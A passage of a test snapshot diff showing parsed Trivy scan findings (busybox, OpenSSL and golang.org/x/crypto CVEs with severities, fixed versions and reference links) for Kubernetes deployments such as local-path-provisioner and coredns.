"scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://avd.aquasec.com/nvd/cve-2021-42383", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8057.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-42383", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8057", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/962", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/pull/987", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", }, { "type": "URL", - "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42384", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42384", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42384", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", + "value": "https://access.redhat.com/security/cve/CVE-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42385", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42385", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42385", + ], + }, + "category": "Vulnerability", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", + "value": "https://avd.aquasec.com/nvd/cve-2021-42385", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://access.redhat.com/security/cve/CVE-2021-42385", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0322", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20211202192323-5770296d904e", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43565", - "installedVersion": "v0.0.0-20210513164829-c07d793c2f9a", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42386", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43565", - "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", - "https://go.dev/cl/368814/", - "https://go.dev/issues/49932", - "https://groups.google.com/forum/#!forum/golang-announce", - "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", - "https://pkg.go.dev/vuln/GO-2022-0968", - "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "https://access.redhat.com/security/cve/CVE-2021-42386", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42386", ], }, "category": "Vulnerability", - "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "golang.org/x/crypto: empty plaintext packet causes panic", + "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43565", + "value": "https://avd.aquasec.com/nvd/cve-2021-42386", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43565", + "value": "https://access.redhat.com/security/cve/CVE-2021-42386", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://go.dev/cl/368814/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", }, { "type": "URL", - "value": "https://go.dev/issues/49932", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://groups.google.com/forum/#!forum/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0968", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", + "value": "https://ubuntu.com/security/notices/USN-5179-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20210513164829-c07d793c2f9a", - "packageName": "golang.org/x/crypto", + "fixedVersion": "1.31.1-r22", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2022-28391", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "https://access.redhat.com/security/cve/CVE-2022-28391", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "https://www.cve.org/CVERecord?id=CVE-2022-28391", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "busybox: remote attackers may execute arbitrary code if netstat is used", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2022-28391", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "https://access.redhat.com/security/cve/CVE-2022-28391", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.31.1-r21", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-42374", + "installedVersion": "1.31.1-r16", + "packageName": "busybox", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-42374", + "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "https://security.netapp.com/advisory/ntap-20211223-0002/", + "https://ubuntu.com/security/notices/USN-5179-1", + "https://www.cve.org/CVERecord?id=CVE-2021-42374", + ], + }, + "category": "Vulnerability", + "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://avd.aquasec.com/nvd/cve-2021-42374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://access.redhat.com/security/cve/CVE-2021-42374", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://ubuntu.com/security/notices/USN-5179-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1l-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", + "references": [ + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", + ], + }, + "category": "Vulnerability", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "mitigation": undefined, + "name": "openssl: SM2 Decryption Buffer Overflow", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": 